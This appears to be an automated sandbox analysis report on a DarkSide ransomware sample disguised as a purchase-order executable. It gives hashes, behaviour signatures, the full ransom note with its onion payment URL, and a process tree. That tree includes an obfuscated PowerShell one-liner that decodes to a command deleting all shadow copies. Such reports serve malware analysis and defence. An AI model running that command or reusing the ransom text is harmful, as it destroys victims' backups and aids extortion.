Analysis

  • max time kernel
    57s
  • max time network
    81s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    04-08-2021 17:54

General

  • Target

    PurchaseOrderPoster.bin.exe

  • Size

    30KB

  • MD5

    f00aded4c16c0e8c3b5adfc23d19c609

  • SHA1

    86ca4973a98072c32db97c9433c16d405e4154ac

  • SHA256

    4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a

  • SHA512

    a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf

Malware Config

Extracted

Path

C:\\README.f2cbf9aa.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3 When you open our website, put the following data in the input form: Key: 5l5BZPnhuDEYAVqJR4MgValoWwML2OjDOtYwubDXeXGefcJDd4otfGdb9pJPrHW7Rt0XqdwabTWl9I5xhiHBsW6mg5BoqR4M2LZ0TI1hN4ifY7RVgRakjxxhhyImncWtgNb8LWtJlhn6cwtDLlsIjq0wAn8s7YsdzgTPPreHXEyFiFH1ozVIpZXV1mO5QXMZu16DNkFcXVIfdw5gPeSYjd3VAa7VlIH8IXgwCuza7YprCeDIOmvRqYK1jBH4s4nn0VyEHnWRndP7jNNUmat6FMhNzeKnLYGbMDRwmZR6iFdFX0Y3lhEWenDamVRchRSE5YwiL9LqTfkrnrswflssAB0SOcodZXRxG5HNItcitj3Za1NzC5fmBpdKN4jV01hMBG98ZEN8HMKeOdVxKtbAZP86K9IfBy8QcNrWLQ2hAeup6DD6KsG8R0Jj8czKTu4MDlGaxQMtPSycA0B6IzpPVV0Tbn9yWIIFH6y4mir71zDWbcPH3p5Hnr80gTnOFHXGzkGfrdy1bjn5H99zniLFFjchV8EEPMtgG2PwKF7NVQ9dTdlMBHWQpGc !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 15 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1688
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1180

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

    MD5

    b7546c0b9e4430370f293aaae4016784

    SHA1

    2dfdd1a95ed4b753d28678b4424e7d651c9361e2

    SHA256

    801f1c2f32246bd5bb02615b1fd8c385b73abbb29b29a20c47ef4be4a0e2e366

    SHA512

    03b0d992846adc4c00e9f44df5461dee27e1a40fe89c82f306240c89130598043df14ba352c1694f09fce3ae7d06ec5ae16ca548dc6ea14879f5fac000461175

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    MD5

    1c25162407082e257e436093bf54505f

    SHA1

    6d9ee3dca14d634e47dba967980b5a4c3f191d82

    SHA256

    0db98bca97c422ec840ad425b16a111afff3749eee9ed6589664234e8338b376

    SHA512

    0c12a5dd7dd1fbfda5da3cc31b5e66543daf0d4d38b82074b2a881fa250f02d7d2c4c80d9f132072f981c046c47318e5122ad97e49b01669f5830a8df12eada3

  • memory/1688-65-0x000000001AD50000-0x000000001AD52000-memory.dmp

    Filesize

    8KB

  • memory/1688-62-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1688-63-0x000000001ADD0000-0x000000001ADD1000-memory.dmp

    Filesize

    4KB

  • memory/1688-64-0x00000000023C0000-0x00000000023C1000-memory.dmp

    Filesize

    4KB

  • memory/1688-66-0x000000001AD54000-0x000000001AD56000-memory.dmp

    Filesize

    8KB

  • memory/1688-67-0x00000000024E0000-0x00000000024E1000-memory.dmp

    Filesize

    4KB

  • memory/1688-68-0x000000001C2F0000-0x000000001C2F1000-memory.dmp

    Filesize

    4KB

  • memory/1688-69-0x0000000002630000-0x0000000002631000-memory.dmp

    Filesize

    4KB

  • memory/1688-61-0x000007FEFB891000-0x000007FEFB893000-memory.dmp

    Filesize

    8KB

  • memory/1688-60-0x0000000000000000-mapping.dmp

  • memory/1972-59-0x00000000760B1000-0x00000000760B3000-memory.dmp

    Filesize

    8KB